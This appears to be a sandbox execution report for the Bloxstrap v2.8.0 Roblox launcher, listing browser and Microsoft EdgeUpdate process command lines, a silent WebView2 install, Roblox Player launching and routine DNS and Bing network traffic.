"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3420 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x478 0x404
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5652 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6700 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f75d0cf3-09d1-4488-a6ce-bd4a4b387f77} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2392 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c23d27d6-8463-47d8-82e4-8a7c3bcad972} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 2984 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8a2a730-3453-48b9-bcfe-4fd32c915a05} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3824 -childID 2 -isForBrowser -prefsHandle 3816 -prefMapHandle 3808 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1760ddf7-549a-420e-85dc-081b8d5f896d} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4612 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4604 -prefMapHandle 4600 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b6693a5-ad40-4d40-a0d9-0d487edf2d70} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 3 -isForBrowser -prefsHandle 5444 -prefMapHandle 5440 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd8b1b62-0419-4b13-bf48-49dfc4c9c5f5} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5564 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fe43752-b621-4e8f-a45c-35b7991dedfc} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5840 -childID 5 -isForBrowser -prefsHandle 5760 -prefMapHandle 5768 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0490240-196a-4cfe-b7c9-602f79e57de3} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6208 -childID 6 -isForBrowser -prefsHandle 5584 -prefMapHandle 6188 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0bb449e-f7fc-4bdb-8129-1da64d190d31} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6396 -childID 7 -isForBrowser -prefsHandle 6328 -prefMapHandle 6408 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1398694a-4c7b-402a-bbe6-fd2d25b02c4d} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6612 -childID 8 -isForBrowser -prefsHandle 5908 -prefMapHandle 5732 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b3aa523-ff3d-4721-836c-37fdf7cf415c} 1216 "\\.\pipe\gecko-crash-server-pipe.1216" tab
C:\Users\Admin\Downloads\Bloxstrap-v2.8.0.exe
"C:\Users\Admin\Downloads\Bloxstrap-v2.8.0.exe"
C:\Users\Admin\AppData\Local\Bloxstrap\Roblox\Player\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
"C:\Users\Admin\AppData\Local\Bloxstrap\Roblox\Player\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe" /silent /install
C:\Program Files (x86)\Microsoft\Temp\EU41D8.tmp\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\Temp\EU41D8.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QUU3NjFDQzItOUZCQi00OTMzLTlCMEItRDk5QzQ0Rjc0QzZGfSIgdXNlcmlkPSJ7MUE1N0VEMzctQjIxNS00MkU3LUJGMkUtQTAwMDIzQjU3QjFEfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InsxODMxRTcyNi1DODFCLTQ4QkYtODA4OS1BQzcyMkQwRTg4QUN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTcxLjM5IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MTc2OTM2NjIxIiBpbnN0YWxsX3RpbWVfbXM9IjM1NSIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{AE761CC2-9FBB-4933-9B0B-D99C44F74C6F}" /silent
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QUU3NjFDQzItOUZCQi00OTMzLTlCMEItRDk5QzQ0Rjc0QzZGfSIgdXNlcmlkPSJ7MUE1N0VEMzctQjIxNS00MkU3LUJGMkUtQTAwMDIzQjU3QjFEfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins2RDI0QUQ2Qi1GRUUzLTQwRDMtQTNBRC00MUZDNzZGNjI3OUF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSI1IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MTgxMDI2NzA5Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\MicrosoftEdge_X64_130.0.2849.52.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\MicrosoftEdge_X64_130.0.2849.52.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\EDGEMITMP_8058C.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\EDGEMITMP_8058C.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\MicrosoftEdge_X64_130.0.2849.52.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\EDGEMITMP_8058C.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\EDGEMITMP_8058C.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=130.0.6723.59 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\EDGEMITMP_8058C.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=130.0.2849.52 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff7a49dd730,0x7ff7a49dd73c,0x7ff7a49dd748
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QUU3NjFDQzItOUZCQi00OTMzLTlCMEItRDk5QzQ0Rjc0QzZGfSIgdXNlcmlkPSJ7MUE1N0VEMzctQjIxNS00MkU3LUJGMkUtQTAwMDIzQjU3QjFEfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InszNzkzNUJCQS00OTA3LTQ3NEYtODI5Qi1GNUI2QjA2QkM4NzB9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMwLjAuMjg0OS41MiIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzE5MzA0NjYzMSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjcxOTMwNjY2NDQiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NDI1Nzc2NjM5IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuZi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy85OTI5Y2ZmNC0zNDg3LTQ4MDUtOTNmNy04NmFjYjgxM2UyNmI_UDE9MTczMDYzOTYwMyZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1EY3lFa2E5WWpIQ0swdVpIMkpMUFJERGd6dk4lMmIlMmY0QkhobGtxRjMzeGFVNXduc01vMllmczlLdFVpS3ElMmJOamZzRjVyYUZtaFRrS0p1d25kS0RmU0xmQSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3NDkyNTkwNCIgdG90YWw9IjE3NDkyNTkwNCIgZG93bmxvYWRfdGltZV9tcz0iMTY4ODUiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NDI1ODg2NjMyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzQ0MDkyNjc1MSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iODA1MzY2NjU1MyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9Ijg0OCIgZG93bmxvYWRfdGltZV9tcz0iMjMyNzkiIGRvd25sb2FkZWQ9IjE3NDkyNTkwNCIgdG90YWw9IjE3NDkyNTkwNCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNjEyNzMiLz48L2FwcD48L3JlcXVlc3Q-
C:\Users\Admin\AppData\Local\Bloxstrap\Roblox\Player\RobloxPlayerBeta.exe
"C:\Users\Admin\AppData\Local\Bloxstrap\Roblox\Player\RobloxPlayerBeta.exe" -isInstallerLaunch
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/bloxstraplabs/bloxstrap/wiki/Roblox-crashes-or-does-not-launch
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb171446f8,0x7ffb17144708,0x7ffb17144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
